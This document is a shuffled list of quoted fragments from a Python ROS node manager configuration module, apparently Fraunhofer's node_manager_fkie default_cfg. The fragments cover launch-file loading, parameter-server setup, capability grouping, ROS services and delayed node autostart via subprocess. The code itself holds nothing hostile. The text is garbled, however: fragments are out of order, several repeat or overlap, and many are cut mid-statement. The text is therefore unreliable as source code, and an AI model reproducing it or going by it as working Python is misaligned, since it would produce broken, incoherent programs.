"start_now = False # start timer for delayed start start_timer = threading.Timer(start_delay, self._run_node,",
"None try: # multi-call style xmlrpc param_server_multi = xmlrpclib.MultiCall(param_server) # clear specified parameter",
"p.value: capabilies_descr[entry[0]] = {'type': ''.join([entry[1]]), 'images': entry[2].split(','), 'description': self._decode(entry[3])} # get the capability",
"set delayed autostart parameter self._run_node(popen_cmd, cwd, new_env, rospy.names.ns_join(n.namespace, n.name), autostart) if len(cmd) >",
"= rospy.get_param('~load_params_at_start', True) self.parameter_loaded = False rospy.loginfo(\"load_params_at_start: %s\" % self.load_params_at_start) self.argv = rospy.get_param('~argv',",
"# multi-call style xmlrpc param_server_multi = xmlrpclib.MultiCall(param_server) # clear specified parameter namespaces #",
"a node. ''' self.runNode(req.node) return [] def rosservice_reload(self, req): self.load(2.) return [] #",
"ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED",
"new_env['ROS_NAMESPACE'] = n.namespace # set delayed autostart parameter self._run_node(popen_cmd, cwd, new_env, rospy.names.ns_join(n.namespace, n.name),",
"entry[3].split(',') dr.robot_descr = self._decode(entry[4]) break except: pass # get the sensor description tmp_cap_dict",
"if ns == cap_ns and p.value in groups: groups[p.value]['nodes'].append(node_fullname) added = True break",
"the caller about a new configuration. ''' self.description_response = ListDescriptionResponse() # variables to",
"result.append(a) return result def load(self, delay_service_creation=0.): ''' Load the launch file configuration '''",
"int(self.roscfg.params[respawn_delay].value) except: pass return result def get_ros_home(self): ''' Returns the ROS HOME path",
".screen_handler import ScreenHandler # , ScreenHandlerException class LoadException(Exception): ''' The exception throwing while",
"rospy.get_param('~autostart', False) rospy.loginfo(\"do_autostart: %s\" % self.do_autostart) self.load_params_at_start = rospy.get_param('~load_params_at_start', True) self.parameter_loaded = False",
"'type', 'name', 'images', 'description'] -> ignore\", param) else: for entry in p.value: try:",
"import ScreenHandler # , ScreenHandlerException class LoadException(Exception): ''' The exception throwing while searching",
"roslib.rosenv.get_master_uri() def _timed_service_creation(self): with self.__lock: try: if self.runService is None: self.runService = rospy.Service('~run',",
"the 'BASH_ENV' and 'ENV' from environment new_env = dict(os.environ) try: for k in",
"print(\"WRONG format, expected: ['host(ROS master Name)', 'type', 'name', 'images', 'description'] -> ignore\", param)",
"coding to unicode. @param val: the string coding as system default @type val:",
"self.get_ros_home() if not (n.cwd is None): if n.cwd == 'ROS_HOME': cwd = self.get_ros_home()",
"filename) except roslib.packages.ROSPkgException as e: # multiple nodes, invalid package raise StartException(str(e)) except",
"autostart=False): self._pending_starts.add(node) start_now = True start_delay = self._get_start_delay(node) start_required = self._get_start_required(node) if autostart",
"use two separate loops, to create the description list first for param, p",
"or without # modification, are permitted provided that the following conditions # are",
"= [cmd] if cmd is None or len(cmd) == 0: raise StartException('%s in",
"True) self.parameter_loaded = False rospy.loginfo(\"load_params_at_start: %s\" % self.load_params_at_start) self.argv = rospy.get_param('~argv', []) rospy.loginfo(\"argv:",
"loader = XmlLoader() argv = self._filter_args(sys.argv) # remove namespace from sys.argv to avoid",
"# def rosservice_load_launch(self, req): # ''' # Load the launch file # '''",
"params.itervalues(): # suppressing this as it causes too much spam # printlog(\"setting parameter",
"loadParams(self): ''' Loads all parameter into ROS parameter server. ''' params = dict()",
"dict() for (ns, groups) in result[machine_name].items(): if ns == cap_ns and p.value in",
"rospy.names.ns_join(node, 'respawn/delay') try: result['max'] = int(self.roscfg.params[respawn_max].value) except: pass try: result['min_runtime'] = int(self.roscfg.params[respawn_min_runtime].value) except:",
"the capability nodes for item in self.roscfg.nodes: node_fullname = roslib.names.ns_join(item.namespace, item.name) machine_name =",
"# self.__lock.release() # return [] def rosservice_description(self, req): ''' Returns the current description.",
"machine = self.roscfg.machines[machine].address if not machine or roslib.network.is_local_address(machine): for ns, group_dict in ns_dict.items():",
"self.listService is not None: self.listService.shutdown('reload config') self.listService = None self.nodes = [] #",
"the package containing the launch file or an empty string, if the C{file}",
"and p.value in groups: groups[p.value]['nodes'].append(node_fullname) added = True break if not added: ns",
"string @rtype: C{unicode} or original on error ''' result = val.replace(\"\\\\n \", \"\\n\")",
"= xmlrpclib.MultiCall(param_server) # clear specified parameter namespaces # #2468 unify clear params to",
"a in argv: in_filter = False for f in afilter: if a.startswith(f): in_filter",
"= {'type': capabilies_descr[p.value]['type'], 'images': capabilies_descr[p.value]['images'], 'description': capabilies_descr[p.value]['description'], 'nodes': []} except: result[machine_name][ns][p.value] = {'type':",
"node_cmd cmd_args.append(n.args) cmd_args[len(cmd_args):] = args # print 'runNode: ', cmd_args popen_cmd = shlex.split(str('",
"from __future__ import print_function from multimaster_msgs_fkie.msg import Capability from multimaster_msgs_fkie.srv import ListDescription, ListNodes,",
"roslib.network import rospy import shlex import std_srvs.srv import subprocess import sys import threading",
"set parameter: %s\" % (msg)) except Exception: raise # re-raise as this is",
"for grouping the nodes. @return: the capabilities description stored in this configuration @rtype:",
"# if more then one launch file is found, take the first one",
"conditions # are met: # # * Redistributions of source code must retain",
"start_delay = self._get_start_delay(node) start_required = self._get_start_required(node) if autostart and start_required: start_now = False",
"name of nodes with namespace self.sensors = {} # sensor descriptions launch_path =",
"ARE DISCLAIMED. IN NO EVENT SHALL THE # COPYRIGHT OWNER OR CONTRIBUTORS BE",
"error occurred while start. ''' if not self.parameter_loaded: self.loadParams() n = None for",
"cap_ns = roslib.names.SEP cap_param = roslib.names.ns_join(cap_ns, 'capability_group') if cap_ns == node_fullname: cap_ns =",
"'node': cwd = os.path.dirname(cmd[0]) respawn = [''] if n.respawn: respawn = self._get_node('node_manager_fkie', 'respawn')",
"self.roscfg.nodes: if item.machine_name and not item.machine_name == 'localhost': machine = self.roscfg.machines[item.machine_name] if roslib.network.is_local_address(machine.address):",
"types str or array of string if sys.version_info[0] <= 2: import types string_types",
"respawn_min_runtime = rospy.names.ns_join(node, 'respawn/min_runtime') respawn_delay = rospy.names.ns_join(node, 'respawn/delay') try: result['max'] = int(self.roscfg.params[respawn_max].value) except:",
"to unicode. @param val: the string coding as system default @type val: str",
"the distribution. # * Neither the name of Fraunhofer nor the names of",
"support? # if machine.env_args: # env[len(env):] = machine.env_args # nm.screen().testScreen() cmd = self._get_node(n.package,",
"get the sensor description tmp_cap_dict = self.getCapabilitiesDesrc() for machine, ns_dict in tmp_cap_dict.items(): if",
"topic start_timer = threading.Timer(3., self._run_node, args=(cmd, cwd, env, node, autostart)) start_timer.start() if start_now",
"and len(p.value[0]) != 4: print(\"WRONG format, expected: ['name', 'type', 'images', 'description'] -> ignore\",",
"argv = self._filter_args(sys.argv) # remove namespace from sys.argv to avoid load the launchfile",
"item.namespace.rstrip(roslib.names.SEP) # if the parameter group parameter found, assign node to the group",
"self.__lock.acquire() # self.load(req.package, req.file, req.argv) # finally: # self.__lock.release() # return [] def",
"parameter server. ''' params = dict() for param, value in self.roscfg.params.items(): params[param] =",
"StartException(Exception): ''' The exception throwing while run a node containing in the loaded",
"empty string, if the C{file} is an absolute path @type package: C{str} @return:",
"self._decode(entry[3])} # get the capability nodes for item in self.roscfg.nodes: node_fullname = roslib.names.ns_join(item.namespace,",
"clear specified parameter namespaces # #2468 unify clear params to prevent error for",
"== cap_ns and p.value in groups: groups[p.value]['nodes'].append(node_fullname) added = True break if not",
"PARAMS:\\n%s\", '\\n'.join(params)) self._load_parameters(self.masteruri, params, self.roscfg.clear_params) self.parameter_loaded = True def runNode(self, node, autostart=False): '''",
"param_server_multi = xmlrpclib.MultiCall(param_server) for p in params.itervalues(): # suppressing this as it causes",
"without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE",
"sys.argv to avoid load the launchfile info local namespace sys.argv = list(argv) #",
"the launch file in the given package. If more then one launch file",
"node: the name of the node @type node: C{str} @raise StartException: if an",
"group in the namespace of the node if ns not in result[machine_name]: result[machine_name][ns]",
"['__ns:=', '__name:=', '_package:=', '_launch_file:='] result = [] for a in argv: in_filter =",
"= XmlLoader() argv = self._filter_args(sys.argv) # remove namespace from sys.argv to avoid load",
"in self.roscfg.nodes: itemname = rospy.names.ns_join(item.namespace, item.name) if itemname == node: n = item",
"the capabilities description stored in this configuration @rtype: C{dict(machine : dict(namespace: dict(group:dict('type' :",
"else '' args = ['__ns:=%s' % n.namespace, '__name:=%s' % n.name] if not (n.cwd",
"ListNodesResponse # , LoadLaunch from rosgraph.rosenv import ROS_NAMESPACE from roslaunch import ROSLaunchConfig, XmlLoader",
"self.description_response = dr = ListDescriptionResponse() dr.robot_name = '' dr.robot_type = '' dr.robot_descr =",
"raise StartException(\"Failed to clear parameter: %s\"%(msg)) # multi-call objects are not reusable param_server_multi",
"param) else: for entry in p.value: capabilies_descr[entry[0]] = {'type': ''.join([entry[1]]), 'images': entry[2].split(','), 'description':",
"pass # add node environment parameter for k, v in n.env_args: new_env[k] =",
"params, clear_params): \"\"\" Load parameters onto the parameter server \"\"\" try: import xmlrpclib",
"OF MERCHANTABILITY AND FITNESS # FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO",
"a new configuration. if self.runService is not None: self.runService.shutdown('reload config') self.runService = None",
"exception throwing while searching for the given launch file. ''' pass class StartException(Exception):",
"None: self.listService.shutdown('reload config') self.listService = None self.nodes = [] # the name of",
"found, assign node to the group if cap_param in self.roscfg.params and self.roscfg.params[cap_param].value: p",
"the node with given name from the currently loaded configuration. @param node: the",
"start start_timer = threading.Timer(start_delay, self._run_node, args=(cmd, cwd, env, node, False)) start_timer.start() if start_now:",
"= {} '''@ivar: Sensor description: C{dict(node name : [(sensor type, sensor name, sensor",
"if start_now and autostart and start_delay > 0: start_now = False # start",
"''' try: import rospkg.distro distro = rospkg.distro.current_distro_codename() if distro in ['electric', 'diamondback', 'cturtle']:",
"% str(cmd)) def _run_node(self, cmd, cwd, env, node, autostart=False): self._pending_starts.add(node) start_now = True",
"suppressing this as it causes too much spam # printlog(\"setting parameter [%s]\"%p.key) param_server_multi.setParam(rospy.get_name(),",
"string_types): cmd = [cmd] if cmd is None or len(cmd) == 0: raise",
"parameters into the ROS parameter server if self.load_params_at_start: self.loadParams() # initialize the ROS",
"cap.nodes = list(descr_dict['nodes']) dr.capabilities.append(cap) # load parameters into the ROS parameter server if",
"p in params.itervalues(): # suppressing this as it causes too much spam #",
"is not None and not item.machine_name == 'localhost' else '' added = False",
"list): if len(p.value) > 0 and len(p.value[0]) != 5: print(\"WRONG format, expected: ['host(ROS",
"= ('', '', '') '''@ivar: robot description as tupel of (type, name, text)",
"# POSSIBILITY OF SUCH DAMAGE. from __future__ import print_function from multimaster_msgs_fkie.msg import Capability",
"except: return roslib.rosenv.get_master_uri() def _timed_service_creation(self): with self.__lock: try: if self.runService is None: self.runService",
"[%s] not found!' % (path, package)) def rosservice_list_nodes(self, req): ''' Callback for the",
"cwd = os.path.dirname(cmd[0]) respawn = [''] if n.respawn: respawn = self._get_node('node_manager_fkie', 'respawn') #",
"not item.machine_name == 'localhost' else '' added = False cap_param = roslib.names.ns_join(node_fullname, 'capability_group')",
"C{str} @return: the absolute path of the launch file @rtype: C{str} @raise LoadException:",
"['__ns:=%s' % n.namespace, '__name:=%s' % n.name] if not (n.cwd is None): args.append('__cwd:=%s' %",
"CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT # LIABILITY,",
"spaces.''' self.sensors = {} '''@ivar: Sensor description: C{dict(node name : [(sensor type, sensor",
"autostart)) start_timer.start() if start_now and autostart and start_delay > 0: start_now = False",
"OR CONSEQUENTIAL DAMAGES (INCLUDING, # BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS",
"an absolute path @type package: C{str} @return: the absolute path of the launch",
"cmd_args popen_cmd = shlex.split(str(' '.join(cmd_args))) rospy.loginfo(\"run node '%s as': %s\", node, str(' '.join(popen_cmd)))",
"The exception throwing while searching for the given launch file. ''' pass class",
"@param package: the package containing the launch file or an empty string, if",
"StartException('%s in package [%s] not found!' % (filename, pkg)) return cmd def _get_start_exclude(self,",
"in self.roscfg.params and cap_param.count(roslib.names.SEP) > 1: cap_ns = roslib.names.namespace(cap_ns).rstrip(roslib.names.SEP) if not cap_ns: cap_ns",
"import Capability from multimaster_msgs_fkie.srv import ListDescription, ListNodes, Task, ListDescriptionResponse, ListNodesResponse # , LoadLaunch",
"process to avoid 'defunct' processes thread = threading.Thread(target=ps.wait) thread.setDaemon(True) thread.start() # remove from",
"n.name) return # env = n.env_args prefix = n.launch_prefix if n.launch_prefix is not",
"the ROS services # rospy.Service('~load', LoadLaunch, self.rosservice_load_launch) self._reload_service = rospy.Service('~reload', std_srvs.srv.Empty, self.rosservice_reload) rospy.Service('~description',",
"new group in the namespace of the node if ns not in result[machine_name]:",
"= self._decode(entry[2]) dr.robot_type = entry[1] dr.robot_images = entry[3].split(',') dr.robot_descr = self._decode(entry[4]) break except:",
"self._pending_starts.add(node) start_now = True start_delay = self._get_start_delay(node) start_required = self._get_start_required(node) if autostart and",
"# print the current pending autostarts if self._pending_starts_last_printed != self._pending_starts: self._pending_starts_last_printed.clear() self._pending_starts_last_printed.update(self._pending_starts) rospy.loginfo(\"Pending",
"_decode(self, val): ''' Replaces the '\\\\n' by LF (Line Feed) and decode the",
"isinstance(cmd, string_types): cmd = [cmd] if cmd is None or len(cmd) == 0:",
"a launch file to inform the caller about a new configuration. ''' self.listService",
"get the list with available nodes. ''' return ListNodesResponse(self.nodes) def rosservice_start_node(self, req): '''",
"package: C{str} @return: the absolute path of the launch file @rtype: C{str} @raise",
"= int(self.roscfg.params[respawn_min_runtime].value) except: pass try: result['delay'] = int(self.roscfg.params[respawn_delay].value) except: pass return result def",
"''' pass class StartException(Exception): ''' The exception throwing while run a node containing",
"ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT # LIABILITY, OR TORT",
"sys.argv.extend(self.argv) if self.do_autostart: rospy.set_param('~autostart', False) # initialize the ROS services # rospy.Service('~load', LoadLaunch,",
"= rospy.names.ns_join(rosgraph.names.namespace(node), topic) except: pass return topic def _get_respawn_params(self, node): result = {'max':",
"% respawn_params['max'])) if respawn_params['min_runtime'] > 0: n.env_args.append(('RESPAWN_MIN_RUNTIME', '%d' % respawn_params['min_runtime'])) if respawn_params['delay'] >",
"> 0: n.env_args.append(('RESPAWN_MAX', '%d' % respawn_params['max'])) if respawn_params['min_runtime'] > 0: n.env_args.append(('RESPAWN_MIN_RUNTIME', '%d' %",
"environment parameter for k, v in n.env_args: new_env[k] = v # the ROS_NAMESPACE",
"node): param_name = rospy.names.ns_join(node, 'default_cfg/autostart/exclude') try: return bool(self.roscfg.params[param_name].value) except: pass return False def",
"cap.images = list(descr_dict['images']) cap.description = descr_dict['description'] cap.nodes = list(descr_dict['nodes']) dr.capabilities.append(cap) # load parameters",
"= xmlrpclib.ServerProxy(masteruri) p = None try: # multi-call style xmlrpc param_server_multi = xmlrpclib.MultiCall(param_server)",
"''' Load the launch file configuration ''' with self.__lock: self._pending_starts.clear() # shutdown the",
"StartException(\"Node '%s' not found!\" % node) if autostart and self._get_start_exclude(rospy.names.ns_join(n.namespace, n.name)): # skip",
"= rospy.Service('~run', Task, self.rosservice_start_node) # self.listServic = rospy.Service('~list_nodes', ListNodes, self.rosservice_list_nodes) # except: #",
"while run a node containing in the loaded configuration. ''' pass class DefaultCfg(object):",
"try: self._pending_starts.remove(node) except: pass # print the current pending autostarts if self._pending_starts_last_printed !=",
"# initialize the ROS services # HACK to let the node_manager to update",
"pending autostarts try: self._pending_starts.remove(node) except: pass # print the current pending autostarts if",
"source and binary forms, with or without # modification, are permitted provided that",
"for topic, datatype in master.getPublishedTopics(''): if start_required == topic: start_now = True break",
"LoadException: if the given file is not found ''' launch_file = path #",
"# disclaimer in the documentation and/or other materials provided # with the distribution.",
"params = dict() for param, value in self.roscfg.params.items(): params[param] = value # rospy.loginfo(\"register",
"topics from ROS master master = rosgraph.masterapi.Master(self.masteruri) for topic, datatype in master.getPublishedTopics(''): if",
"file to inform the caller about a new configuration. ''' self.description_response = ListDescriptionResponse()",
"= set() self._pending_starts_last_printed = set() def _filter_args(self, argv): afilter = ['__ns:=', '__name:=', '_package:=',",
"#2468 unify clear params to prevent error for p in clear_params: param_server_multi.deleteParam(rospy.get_name(), p)",
"'nodes': []} except: result[machine_name][ns][p.value] = {'type': '', 'images': [], 'description': '', 'nodes': []}",
"add remaps for remap in n.remap_args: args.append('%s:=%s' % (remap[0], remap[1])) # masteruri =",
"the description list first for param, p in self.roscfg.params.items(): if param.endswith('capabilities'): if isinstance(p.value,",
"rosgraph.names.is_private(topic): rospy.logwarn('Private for autostart required topic `%s` is ignored!' % topic) topic =",
"of the node if ns not in result[machine_name]: result[machine_name][ns] = dict() if p.value",
"req): ''' Returns the current description. ''' return self.description_response def loadParams(self): ''' Loads",
"roslib.rosenv.get_ros_home() else: import rospkg return rospkg.get_ros_home() except: import traceback print(traceback.format_exc()) import roslib.rosenv return",
"HOWEVER # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT",
"len(p.value) > 0 and len(p.value[0]) != 4: print(\"WRONG format, expected: ['name', 'type', 'images',",
"@param val: the string coding as system default @type val: str @return: the",
"all parameter into ROS parameter server. ''' params = dict() for param, value",
"= self.roscfg.machines[machine].address if not machine or roslib.network.is_local_address(machine): for ns, group_dict in ns_dict.items(): for",
"masteruri = self.masteruri # if n.machine_name and not n.machine_name == 'localhost': # machine",
"(INCLUDING, # BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; #",
"ROS services # HACK to let the node_manager to update the view if",
"= dict() if p.value not in result[machine_name][ns]: try: result[machine_name][ns][p.value] = {'type': capabilies_descr[p.value]['type'], 'images':",
"env, node, autostart)) start_timer.start() if start_now and autostart and start_delay > 0: start_now",
"print the current pending autostarts if self._pending_starts_last_printed != self._pending_starts: self._pending_starts_last_printed.clear() self._pending_starts_last_printed.update(self._pending_starts) rospy.loginfo(\"Pending autostarts",
"'runNode: ', cmd_args popen_cmd = shlex.split(str(' '.join(cmd_args))) rospy.loginfo(\"run node '%s as': %s\", node,",
"autostart parameter self._run_node(popen_cmd, cwd, new_env, rospy.names.ns_join(n.namespace, n.name), autostart) if len(cmd) > 1: raise",
"masteruri, params, clear_params): \"\"\" Load parameters onto the parameter server \"\"\" try: import",
"processes thread = threading.Thread(target=ps.wait) thread.setDaemon(True) thread.start() # remove from pending autostarts try: self._pending_starts.remove(node)",
"self.roscfg.params[cap_param].value: p = self.roscfg.params[cap_param] if machine_name not in result: result[machine_name] = dict() for",
"is None or len(cmd) == 0: raise StartException('%s in package [%s] not found!'",
"find the capability group parameter in namespace while cap_param not in self.roscfg.params and",
"a.startswith(f): in_filter = True break if ':=' not in a or in_filter: continue",
"documentation and/or other materials provided # with the distribution. # * Neither the",
"else: for entry in p.value: try: print(entry[0], rospy.get_param('/mastername', '')) if not entry[0] or",
"on ROS distribution API. @return: ROS HOME path @rtype: C{str} ''' try: import",
"node containing in the loaded configuration. ''' pass class DefaultCfg(object): def __init__(self): self.nodes",
"if not entry[0] or entry[0] == rospy.get_param('/mastername', ''): dr.robot_name = self._decode(entry[2]) dr.robot_type =",
"os.environ[ROS_NAMESPACE] = rospy.names.SEP rospy.set_param('~argv_used', list(set(argv))) loader.load(launch_path, self.roscfg, verbose=False, argv=argv) # create the list",
"group if cap_param in self.roscfg.params and self.roscfg.params[cap_param].value: p = self.roscfg.params[cap_param] if machine_name not",
"> 0: start_now = False # start timer for delayed start start_timer =",
"return float(self.roscfg.params[param_name].value) except: pass return 0. def _get_start_required(self, node): param_name = rospy.names.ns_join(node, 'default_cfg/autostart/required/publisher')",
"that the following conditions # are met: # # * Redistributions of source",
"rospy.loginfo(\"do_autostart: %s\" % self.do_autostart) self.load_params_at_start = rospy.get_param('~load_params_at_start', True) self.parameter_loaded = False rospy.loginfo(\"load_params_at_start: %s\"",
"'ROS_HOME': cwd = self.get_ros_home() elif n.cwd == 'node': cwd = os.path.dirname(cmd[0]) respawn =",
"self.load(2.) return [] # def rosservice_load_launch(self, req): # ''' # Load the launch",
"ScreenHandler # , ScreenHandlerException class LoadException(Exception): ''' The exception throwing while searching for",
"self.do_autostart = False def _decode(self, val): ''' Replaces the '\\\\n' by LF (Line",
"start_delay > 0: start_now = False # start timer for delayed start start_timer",
"is None): if n.cwd == 'ROS_HOME': cwd = self.get_ros_home() elif n.cwd == 'node':",
"OF LIABILITY, WHETHER IN CONTRACT, STRICT # LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR",
"(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN # ANY WAY OUT OF THE USE",
"# get the robot description self.description_response = dr = ListDescriptionResponse() dr.robot_name = ''",
"a launch file. If package is given, try first to find the launch",
"xmlrpc.client as xmlrpclib param_server = xmlrpclib.ServerProxy(masteruri) p = None try: # multi-call style",
"'ENV' from environment new_env = dict(os.environ) try: for k in ['BASH_ENV', 'ENV']: del",
"searching for the given launch file. ''' pass class StartException(Exception): ''' The exception",
"result def get_ros_home(self): ''' Returns the ROS HOME path depending on ROS distribution",
"import roslib.rosenv return roslib.rosenv.get_ros_home() @classmethod def _load_parameters(cls, masteruri, params, clear_params): \"\"\" Load parameters",
"Returns the master URI depending on ROS distribution API. @return: ROS master URI",
"# if machine.env_args: # env[len(env):] = machine.env_args # nm.screen().testScreen() cmd = self._get_node(n.package, n.type)",
"''' with self.__lock: self._pending_starts.clear() # shutdown the services to inform the caller about",
"contributors may be used to endorse or promote products derived # from this",
"following disclaimer. # * Redistributions in binary form must reproduce the above #",
"except: pass try: result['min_runtime'] = int(self.roscfg.params[respawn_min_runtime].value) except: pass try: result['delay'] = int(self.roscfg.params[respawn_delay].value) except:",
"self._pending_starts.clear() # shutdown the services to inform the caller about a new configuration.",
"disclaimer. # * Redistributions in binary form must reproduce the above # copyright",
"def _get_respawn_params(self, node): result = {'max': 0, 'min_runtime': 0, 'delay': 0} respawn_max =",
"n.env_args: new_env[k] = v # the ROS_NAMESPACE environment is used in cpp plugins",
"Callback for the ROS service to get the list with available nodes. '''",
"PROFITS; OR BUSINESS INTERRUPTION) HOWEVER # CAUSED AND ON ANY THEORY OF LIABILITY,",
"about a new configuration. ''' self.listService = None '''@ivar: The service will be",
"# # Redistribution and use in source and binary forms, with or without",
"self._run_node, args=(cmd, cwd, env, node, False)) start_timer.start() if start_now: ps = subprocess.Popen(cmd, cwd=cwd,",
"COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, # INCIDENTAL, SPECIAL,",
"sys import threading from .screen_handler import ScreenHandler # , ScreenHandlerException class LoadException(Exception): '''",
"ROS HOME path @rtype: C{str} ''' try: import rospkg.distro distro = rospkg.distro.current_distro_codename() if",
"if not isinstance(self.argv, list): self.argv = [\"%s\" % self.argv] sys.argv.extend(self.argv) if self.do_autostart: rospy.set_param('~autostart',",
"NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; # LOSS OF USE,",
"form must reproduce the above # copyright notice, this list of conditions and",
"throwing while searching for the given launch file. ''' pass class StartException(Exception): '''",
"= False # get published topics from ROS master master = rosgraph.masterapi.Master(self.masteruri) for",
"the launch file configuration ''' with self.__lock: self._pending_starts.clear() # shutdown the services to",
"and creates dictionary for grouping the nodes. @return: the capabilities description stored in",
"''' return self.description_response def loadParams(self): ''' Loads all parameter into ROS parameter server.",
"None else '' args = ['__ns:=%s' % n.namespace, '__name:=%s' % n.name] if not",
"Returns the ROS HOME path depending on ROS distribution API. @return: ROS HOME",
"not None: # get the capabilities description # use two separate loops, to",
"from .screen_handler import ScreenHandler # , ScreenHandlerException class LoadException(Exception): ''' The exception throwing",
"the master URI depending on ROS distribution API. @return: ROS master URI @rtype:",
"in_filter = False for f in afilter: if a.startswith(f): in_filter = True break",
"import rospkg return rospkg.get_ros_home() except: import traceback print(traceback.format_exc()) import roslib.rosenv return roslib.rosenv.get_ros_home() @classmethod",
"BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # \"AS IS\" AND ANY EXPRESS OR",
"# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN # ANY WAY",
"# self.timer = rospy.Timer(rospy.Duration(2), self.timed_service_creation, True) # if self.nodes: # self.runService = rospy.Service('~run',",
"the services to inform the caller about a new configuration. if self.runService is",
"# use two separate loops, to create the description list first for param,",
"%s: %s\", n, e) self.do_autostart = False def _decode(self, val): ''' Replaces the",
"if respawn_params['max'] > 0: n.env_args.append(('RESPAWN_MAX', '%d' % respawn_params['max'])) if respawn_params['min_runtime'] > 0: n.env_args.append(('RESPAWN_MIN_RUNTIME',",
"e: rospy.logwarn(\"Error while start %s: %s\", n, e) self.do_autostart = False def _decode(self,",
"respawn environment variables respawn_params = self._get_respawn_params(rospy.names.ns_join(n.namespace, n.name)) if respawn_params['max'] > 0: n.env_args.append(('RESPAWN_MAX', '%d'",
"to start a node. ''' self.runNode(req.node) return [] def rosservice_reload(self, req): self.load(2.) return",
"with namespace self.sensors = {} # sensor descriptions launch_path = self.getPath(self.launch_file, self.package) rospy.loginfo(\"loading",
"CONTRACT, STRICT # LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN #",
"launch file @rtype: C{str} @raise LoadException: if the given file is not found",
"_ in r: # if code != 1: # raise StartException(\"Failed to clear",
"GOODS OR SERVICES; # LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)",
"self.timer = rospy.Timer(rospy.Duration(2), self.timed_service_creation, True) # if self.nodes: # self.runService = rospy.Service('~run', Task,",
"topic def _get_respawn_params(self, node): result = {'max': 0, 'min_runtime': 0, 'delay': 0} respawn_max",
"= value # rospy.loginfo(\"register PARAMS:\\n%s\", '\\n'.join(params)) self._load_parameters(self.masteruri, params, self.roscfg.clear_params) self.parameter_loaded = True def",
"disclaimer in the documentation and/or other materials provided # with the distribution. #",
"dr.robot_type = entry[1] dr.robot_images = entry[3].split(',') dr.robot_descr = self._decode(entry[4]) break except: pass #",
"to inform the caller about a new configuration. if self.runService is not None:",
"cap_ns: cap_ns = roslib.names.SEP cap_param = roslib.names.ns_join(cap_ns, 'capability_group') if cap_ns == node_fullname: cap_ns",
"self.getCapabilitiesDesrc() for machine, ns_dict in tmp_cap_dict.items(): if machine in self.roscfg.machines: machine = self.roscfg.machines[machine].address",
"SERVICES; # LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER #",
"else: self._timed_service_creation() # self.timer = rospy.Timer(rospy.Duration(2), self.timed_service_creation, True) # if self.nodes: # self.runService",
"= rospy.Service('~list_nodes', ListNodes, self.rosservice_list_nodes) # except: # import traceback # print traceback.format_exc() if",
"and/or other materials provided # with the distribution. # * Neither the name",
"if package: paths = roslib.packages.find_resource(package, launch_file) if len(paths) > 0: # if more",
"LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN # ANY WAY OUT",
"# TODO: env-loader support? # if machine.env_args: # env[len(env):] = machine.env_args # nm.screen().testScreen()",
"find the launch file in the given package. If more then one launch",
"except: pass return result def getCapabilitiesDesrc(self): ''' Parses the launch file for C{capabilities}",
"try: topic = self.roscfg.params[param_name].value if rosgraph.names.is_private(topic): rospy.logwarn('Private for autostart required topic `%s` is",
"not added: ns = cap_ns # add new group in the namespace of",
"nodes with name spaces.''' self.sensors = {} '''@ivar: Sensor description: C{dict(node name :",
"_timed_service_creation(self): with self.__lock: try: if self.runService is None: self.runService = rospy.Service('~run', Task, self.rosservice_start_node)",
"rosservice_start_node(self, req): ''' Callback for the ROS service to start a node. '''",
"if respawn_params['delay'] > 0: n.env_args.append(('RESPAWN_DELAY', '%d' % respawn_params['delay'])) node_cmd = [respawn[0], prefix, cmd[0]]",
"''' if not self.parameter_loaded: self.loadParams() n = None for item in self.roscfg.nodes: itemname",
"from the currently loaded configuration. @param node: the name of the node @type",
"False # start timer for delayed start start_timer = threading.Timer(start_delay, self._run_node, args=(cmd, cwd,",
"def rosservice_description(self, req): ''' Returns the current description. ''' return self.description_response def loadParams(self):",
"C{str} @param package: the package containing the launch file or an empty string,",
"import traceback print(traceback.format_exc()) def getPath(self, path, package=''): ''' Searches for a launch file.",
"try: result = result.decode(sys.getfilesystemencoding()) except: pass return result def getCapabilitiesDesrc(self): ''' Parses the",
"runNode(self, node, autostart=False): ''' Start the node with given name from the currently",
"list with names of nodes with name spaces.''' self.sensors = {} '''@ivar: Sensor",
"creates dictionary for grouping the nodes. @return: the capabilities description stored in this",
"n.env_args.append(('RESPAWN_DELAY', '%d' % respawn_params['delay'])) node_cmd = [respawn[0], prefix, cmd[0]] cmd_args = [ScreenHandler.getSceenCmd(node)] cmd_args[len(cmd_args):]",
"list): self.argv = [\"%s\" % self.argv] sys.argv.extend(self.argv) if self.do_autostart: rospy.set_param('~autostart', False) # initialize",
"if an error occurred while start. ''' if not self.parameter_loaded: self.loadParams() n =",
"string_types = types.StringTypes else: string_types = (str,) if isinstance(cmd, string_types): cmd = [cmd]",
"ROS service to get the list with available nodes. ''' return ListNodesResponse(self.nodes) def",
"rospy.set_param('~argv_used', list(set(argv))) loader.load(launch_path, self.roscfg, verbose=False, argv=argv) # create the list with node names",
"environment is used in cpp plugins in rqt if n.namespace: new_env['ROS_NAMESPACE'] = n.namespace",
"self.listServic = rospy.Service('~list_nodes', ListNodes, self.rosservice_list_nodes) # except: # import traceback # print traceback.format_exc()",
"SHALL THE # COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,",
"self.parameter_loaded: self.loadParams() for n in self.nodes: try: self.runNode(n, self.do_autostart) except Exception as e:",
